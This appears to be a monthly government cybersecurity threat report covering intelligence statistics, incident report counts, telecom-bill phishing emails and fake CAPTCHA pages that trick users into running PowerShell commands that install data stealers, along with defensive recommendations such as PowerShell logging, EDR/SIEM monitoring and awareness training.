< Overall Threat Trend >

Ex ante joint defense and monitoring

  A total of 90,758 pieces of government agency cybersecurity joint defense intelligence were collected this month (an increase of 12,243 from the previous month), mainly due to the increase in the number of detected malware programs (an increase over 11,000 cases). Analyzing the types of identifiable threats, the top one was information collection (39%), i.e., mainly obtaining information through attacks such as scanning, detection, and social engineering; followed by intrusion attacks (22%), most involving unauthorized access to systems or acquisition of system/user privileges; and malwares (19%), which was mainly the intelligence related to the malware program. The distribution of intelligence volume in the past year is as shown in Figure 1.

    After further compilation and analysis of joint defense information, it was discovered that hackers recently impersonated a telecommunication company and sent social engineering emails to attack government agencies and the general public by using the notification bill of the current month's telecommunication charges as the main theme. Hackers forged the text of an electronic bill email sent by a telecommunications company as bait, attached a malicious file, and massively distributed emails containing malicious programs for social engineering attacks. Relevant intelligence has provided government agencies with recommendations on joint defense and monitoring.

Figure 1   Statistics of cybersecurity monitoring intelligence in joint defense

In-process reporting and responding

   The number of cybersecurity incident reports totaled 79 this month (a decrease of 134 from the previous month), a 1.46-fold increase compared to the same period last year. This is mainly due to the abnormal connection or suspected download of malicious programs from the information equipment of various agencies during the month, which accounted for 27.85% of the total number of reports for this month. The statistics of cybersecurity incident reports in the past year are as shown in Figure 2.

 Figure 2   Number of cybersecurity incident reports

Post-incident information sharing

    This month, a computer at an agency executed an abnormal PowerShell command, downloaded, and ran malicious programs. Upon investigation, it was found that the user had visited a website offering free tools and was guided through a "I'm not a robot" verification process. This led the user to manually execute the PowerShell command, causing the download and execution of a data-stealing program. The agency subsequently reinstalled the system of the hacked computer and strengthened cybersecurity awareness training for staff to prevent similar incidents from happening in the future.

Additional Reference：

    Recently, it has been discovered that hackers used Windows built-in command line tool "PowerShell" as one of the social engineering attack tools. Hackers inject malicious JavaScript code into websites, and when users visit the compromised webpage, a Captcha verification window and malicious PowerShell commands popped up to lure the victims to manually operate the “Execute” shortcut key (Win+R key) and copy and paste (Ctrl+V) the malicious PowerShell commands provided by hackers, causing the download and execution of a data-stealing program (such as Lumma Stealer) in the background. This leads to the theft of sensitive data such as passwords and encrypted currency wallets. To prevent such threats, it is recommended that organizations enable PowerShell logging and use EDR (Endpoint Detection and Response) and SIEM (Security Information and Event Management) systems to monitor unusual activity in real time, allowing for quick detection and interception of suspicious actions. Furthermore, it is important to strengthen user awareness of cybersecurity to help them recognize phishing attacks and fake verification pages. For instance, If the content of CAPTCHA is different from the common way and displays unknown commands, users should be extra cautious and avoid executing any commands of unknown origins to significantly reduce the risk of data leakage and system breaches.